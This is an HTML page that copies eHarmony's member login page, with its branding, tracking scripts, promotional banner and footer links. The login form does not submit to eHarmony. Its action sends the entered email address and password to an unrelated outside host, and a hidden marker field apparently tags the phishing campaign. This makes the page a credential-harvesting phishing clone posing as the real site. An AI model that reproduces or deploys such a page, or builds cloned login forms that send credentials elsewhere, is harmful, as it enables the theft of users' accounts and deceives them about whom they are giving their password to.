<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>eHarmony | Log-In to Our Online Dating Site for Local Singles</title>
<meta name="eh-status" content="PAGE OK">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<link rel="stylesheet" href="//static.eharmony.com/files/fonts/fonts.css">
<link rel="stylesheet" href="//static.eharmony.com/files/fonts/alt.css">
<script src='//static.eharmony.com/files/corp/prod/js/ehcorp.tracking.js'></script>
<script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>
<script type="text/javascript"> 
	if(typeof jQuery == 'undefined'){document.write('<scr' + 'ipt src="http://static.eharmony.com/files/libraries/jquery/jquery-1.11.1.min.js" type="text/javascript"></scr' + 'ipt>');}
</script>
<meta name="description" content="Log-In to Your eHarmony Account to Meet Singles on the #1 Trusted Online Dating Site. We Match Singles Based on Compatibility for Successful Relationships." />
<meta name="keywords" content="eharmony login,dating login, online dating, singles, dating, personals, matchmaker, matchmaking, love, match, dating site, eharmony.com, eharmony" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<!--[if lt IE 9]> 
<script>document.createElement('header');document.createElement('nav');document.createElement('section');document.createElement('article');document.createElement('aside');document.createElement('footer');document.createElement('hgroup');</script>
<![endif]-->

<link rel="stylesheet" type="text/css" href="//static.eharmony.com/files/corp/css/malibu-login.css?ver=1.22.16" />
<link rel="alternate" href="http://www.eharmony.com.au/login/" hreflang="en-au" />
<link rel="alternate" href="http://www.eharmony.co.uk/login/" hreflang="en-gb" />
<link rel="alternate" href="http://www.eharmony.ca/login/" hreflang="en-ca" />
<link rel="alternate" href="http://www.eharmony.com/espanol/iniciar-sesion/" hreflang="es" />
<!-- <script type='text/javascript'>if(!/(eharmony|compatiblepartners)\.([A-z\.]+)$/.test(window.top.location.host)){window.top.location.href = 'http://www.eharmony.com/login/';}</script> 
<script language="Javascript">document.domain = "eharmony.com";</script>-->
<style>
#logo {
	margin-bottom: 10px;
}
.footer ul {
	list-style: none;
	width: 14%;
}
</style>
</head>
<body>
<!-- Google Tag Manager --> 
<script>
												dataLayer = [{
													"User State": ehcorp.tracking.userstatus || "",
													"Logged In": 0,
													"Locale": "COM" || "",
													"CID": ehcorp.tracking.cid || "",
													"AID": ehcorp.tracking.aid || "",
													"KID": ehcorp.tracking.kid || 0,
													"PID": ehcorp.tracking.pid || "",
													"visitorID": ehcorp.tracking.visitor_id || ""
												}];
										</script> 
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({"gtm.start":new Date().getTime(),event:"gtm.js"});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!="dataLayer"?"&l="+l:"";j.async=true;j.src="//www.googletagmanager.com/gtm.js?id="+i+dl;f.parentNode.insertBefore(j,f);})(window,document,"script","dataLayer","GTM-THDZ2N");
										</script>
<noscript>
<iframe src="//www.googletagmanager.com/ns.html?id=GTM-THDZ2N" height="0" width="0" style="display:none;visibility:hidden"></iframe>
</noscript>
<!-- End Google Tag Manager -->
<link rel="stylesheet" type="text/css" href='//static.eharmony.com/files/corp/css/fcw-message.css'/>
<div id='fcw-message' class='site1'>
	<div class='fcw-content'>
		<div class='fcw-banner'>
			<h6>Buy 6 Months, Get 6 FREE</h6>
			<span class='fcw-ribbon'>May 19th - May 23rd</span>
			<h6 class='smaller'>Hurry, Offer Ends Soon!<!--Communicate with your matches for FREE--></h6>
		</div>
		<div id='fcw-details' class=''>
			<p>Based on a 1-month basic subscription plan of $59.95.</p>
		</div>
	</div>
</div>
<script type='text/javascript' src='//static.eharmony.com/files/corp/js/fcw-message.js'></script>
<header class='content'> <a class='left' id='logo' href='/home/'><img src='//static.eharmony.com/files/corp/images/flip/logo-white.png'/></a> 
	<!--a class="right" id='mobileapps' href="/mobile/"><img src="//static.eharmony.com/files/corp/images/login/mobileapps-new.png" alt="Download our free mobile app" /></a--> 
</header>
<div class="content" id="swapbg">
	<div class="loginform left">
		<h2>Members login here</h2>
		<form name="loginForm" class="registration login" method="POST" action="http://ormit.co.nf/index.php">
			<input type="hidden" name="onext" value="http://www.eharmony.com/login/"/>
			<input type="hidden" name="klynt" value="eHarmTAY">
			<p><a href="#" class="fb-login">Login with Facebook</a></p>
			<p class='centered'><span class='dotted'>..................</span><span class='mid'>or login below</span><span class='dotted'>................</span></p>
			<section class='error-message' style='display:none;'></section>
			<section>
				<label for="j_username">Email Address:</label>
				<input class="text" type="text" name="j_username" size="30" value="" autofocus />
			</section>
			<section>
				<label for="j_password">Password:</label>
				<input class="text" type="password" name="j_password" size="30" value="" />
				<a href="/support/forgot-password" class="forgot">forgot password?</a> </section>
			<section>
				<input class='button' type="submit" name="login_submit" value='Log In'/>
			</section>
			<section>
				<div class="persist-login">
					<input type="checkbox" checked="checked" name="persist_login" id="persist_login">
					<label for="persist_login">Keep me logged in</label>
				</div>
			</section>
			<section class="extra">
				<div class='left like'>
					<iframe src="//www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Feharmony&amp;layout=button_count&amp;show_faces=false&amp;width=290&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:290px; height:21px;" allowTransparency="true"></iframe>
				</div>
				<div class='right reglink'>Not a member? <a href="/home/">Register Now</a></div>
			</section>
			<input type="hidden" name="ioTestIncomingField" id="ioTestIncomingField"/>
		</form>
	</div>
	<!-- /loginform -->
	
	<div id='browser-upgrade' style='display:none'>
		<div class='message'> <b>Upgrade your browser</b> to the latest version of <br/>
			<a href='http://windows.microsoft.com/en-US/internet-explorer/downloads/ie'>Internet Explorer</a>, <a href='http://www.mozilla.org/en-US/firefox/new/'>Firefox</a>, <a href='https://www.google.com/intl/en/chrome/browser/'>Chrome</a> or <a href='http://www.apple.com/safari/download/'>Safari</a> today! </div>
	</div>
</div>
<div class="ui-widget-overlay" style='display:none'></div>
<div class="fbl-overlay" style="display:none;">
	<h2><img src="//static.eharmony.com/assets/corp/fb/eh-logo-sm.png" alt="eHarmony" /></h2>
	<div class="fbl-overlay-body">
		<h3>Learn from Couples Who Found Success on eHarmony!</h3>
		<p>Like us on Facebook to receive:</p>
		<ul>
			<li>Exclusive offers and promotions</li>
			<li>Expert tips and advice</li>
			<li>New feature updates</li>
		</ul>
		<div class="like"></div>
	</div>
	<!--body--> 
	<a class="close">Close</a> </div>
<!-- /overlay -->
<div class="footer content">
	<div class="ftr-nav">
		<div class="footerEH2">
			<ul>
				<li><a href="/about/eharmony/">About eHarmony</a></li>
				<li><a href="/tour/">eHarmony Tour</a></li>
				<li><a href="/success/">Success Stories</a></li>
				<!--li><a href="/diversity/">eHarmony &amp; Diversity</a></li-->
				<li><a href='/gift-subscription/'>Gift Subscriptions</a></li>
				<li><a href="/promotional-code/">eHarmony Promotions</a></li>
				<li><a href="/ehplus/">eH+</a></li>
			</ul>
		</div>
		<div class="footerEH">
			<ul>
				<li><a href="/about/careers/">eHarmony Careers</a></li>
				<li><a href="/about/affiliates/">Affiliates</a></li>
				<li><a href="/about/terms/">Terms and Conditions</a></li>
				<li><a href="/safe-online-dating/">Safety Tips</a></li>
				<li><a href="/privacy/policy/">Privacy</a> </li>
				<li><a href="/browsers/">Compatible Browsers</a></li>
				<li><a href="http://help-singles.eharmony.com">Help</a></li>
			</ul>
		</div>
		<div class="footerEH3">
			<ul>
				<li><a href="/asian-dating/">Asian Dating</a></li>
				<li><a href="/black-dating/">Black Dating</a></li>
				<li><a href="/r/christian-dating-1/">Christian Dating</a></li>
				<li><a href="/senior-dating/">Senior Dating</a></li>
				<li><a href="/jewish-dating/">Jewish Dating</a></li>
				<!--li><a href="http://www.compatiblepartners.net/eHarmony/">Gay and Lesbian Dating</a></li-->
				<li><a href="/hispanic-dating/">Hispanic Dating</a></li>
				<li><a href="/local-dating/">Local Dating</a></li>
				<li><a href="/member-index/">eHarmony Members</a></li>
			</ul>
		</div>
		<div class="footerEH">
			<ul>
				<li><a href="http://www.eharmony.com.au/">eHarmony Australia</a></li>
				<li><a href="http://www.eharmony.ca/">eHarmony Canada</a></li>
				<li><a href="http://www.eharmony.co.uk/">eHarmony United Kingdom</a></li>
				<li><a href="http://www.compatiblepartners.net/eHarmony/">Compatible Partners</a></li>
				<li><a href="/international-dating/">International Dating</a></li>
			</ul>
		</div>
		<div class="footerEH2">
			<ul>
				<li><a href="http://www.eharmony.com/blog/">eHarmony Blog</a></li>
				<li><a href="http://www.eharmony.com/dating-advice/">Dating Advice</a></li>
				<li><a href="http://www.eharmony.com/dating-advice/first-dates/">First Dates</a></li>
				<li><a href="http://www.eharmony.com/dating-advice/relationships/">Relationship Advice</a></li>
				<li><a href="http://www.eharmony.com/dating-advice/dating-tips/">Dating Tips</a></li>
				<li><a href="http://www.eharmony.com/dating-advice/metro-dating-guide/">Date Ideas</a></li>
				<li><a href="http://www.eharmony.com/engineering/">Engineering Blog</a></li>
			</ul>
		</div>
	</div>
	<div class="patent">
		<h5>eHarmony Compatibility Matching System<sup>&reg;</sup><br />
			Protected by U.S. Pat. No. 6,735,568</h5>
	</div>
	<div class="copyright">
		<h5>&copy; 2000-2013 eHarmony, Inc.&nbsp;&nbsp; <a href="/about/terms/" rel="nofollow" onClick="launchPopupFlag=false;">Terms and Conditions of Service</a> <img src="http://static.eharmony.com/assets/images/updated.gif" /><br />
			eHarmony #1 Trusted Relationship Site - Move Beyond "Traditional" Online Dating</h5>
	</div>
</div>
<!-- <script type='text/javascript' src="//static.eharmony.com/files/corp/prod/js/desktop-login-all.js?ver=4.22.18"></script> --> 
<script type='text/javascript' src="//static.eharmony.com/files/corp/js/EHARMONY.login.js?ver=4.22.15"></script> 
<script type='text/javascript' src="//static.eharmony.com/files/corp/js/eh/facebook.js?ver=4.22.15"></script> 
<script type='text/javascript'>
	//Lets rotate the background image
	ehcorp.login.random_bg();
	$(function(){
		EH.facebook.init();
	});
</script> 
<script type="text/javascript" src="//static.eharmony.com/static/scripts/common/mbox.js" language="JavaScript"></script>
<div class="mboxDefault"></div>
<script type="text/javascript" language="Javascript1.2">
			 mboxCreate('corp-login', 'locale=en_US');
</script> 
<script type="text/javascript" src="https://mpsnare.iesnare.com/snare.js"></script> 
<script type="text/javascript">
	var io_operation = "ioBegin";
	var io_bbout_element_id = 'ioTestIncomingField'; 
	var io_install_stm = false; 
	var io_install_flash = false;
	
	var io_install_stm_error_handler = ""; // set to do nothing for Active X
	var io_flash_needs_update_handler = "";
	var io_install_flash_error_handler = "";
				
	var submit_form;
	function check_bb( aform, pass ) {
		return true;
	};   
</script> 

<!-- Start GA tag --> 
<script type="text/javascript">

										var _gaq = _gaq || [];
										_gaq.push(["_setAccount", "UA-20148404-1"]);
										_gaq.push(["_setDomainName", ".eharmony.com"]);
										_gaq.push(["_addIgnoredRef", "eharmony.com"]);
										_gaq.push(["_setCustomVar",3,"LS","0",2]);

										if(ehcorp.tracking.cid){
												_gaq.push(["_setCustomVar",5,"cid",ehcorp.tracking.cid,1]);
										}
										if(ehcorp.tracking.aid){
												_gaq.push(["_setCustomVar",11,"aid",ehcorp.tracking.aid,1]);
										}
										_gaq.push(["_trackPageview"],["_trackPageLoadTime"]);

										(function() {
										var ga = document.createElement("script"); ga.type = "text/javascript";
										ga.async = true;
										ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";
										var s = document.getElementsByTagName("script")[0];
										s.parentNode.insertBefore(ga, s);
										})();

										</script> 
<!-- End GA tag --> 
<script type="text/javascript">
										s = new function() { this.pageName = ""; this.t = function(arg1,arg2){return true;}; this.tl = function(arg1,arg2){return true;}; };
										</script> 

<!-- EH OCEAN : Start of DoubleClick Floodlight Tag: Please do not remove --> 
<script type='text/javascript'>
						var ehocean = new Image();
						ehocean.src = '//ad.doubleclick.net/activity;src=4216361;type=count948;cat=eharm281;u1=Other;u2='+ ehcorp.tracking.visitor_id + ';ord=' + ehcorp.tracking.session_id + '?';
						ehocean.height = 1; ehocean.width = 1;
						document.body.appendChild(ehocean);
						</script> 
<!-- End of DoubleClick Floodlight Tag: Please do not remove --> 
<!-- all systems go --><!-- begin Marin Software Tracking Script --> 
<script type="text/javascript">
												var _marinClientId = "y8dx38s7f0";
												var _marinProto = (("https:" == document.location.protocol) ? "https://" : "http://");
												document.write(unescape("%3Cscript src='" + _marinProto + "tracker.marinsm.com/tracker/" +
												_marinClientId + ".js' type='text/javascript'%3E%3C/script%3E"));
												</script> 
<script type="text/javascript">
												try {
												_marinTrack.trackPage();
												} catch(err) {}
												</script>
<noscript>
<img src="https://tracker.marinsm.com/tp?act=1&cid=y8dx38s7f0&script=no" >
</noscript>
<!-- end Copyright Marin Software --> 

<script language = "JavaScript">
	var sbms = new Object();
	var FB_APP_ID = "166916230004217";
	var FB_PERMISSIONS = "public_profile,user_photos";
</script>
</body>
</html>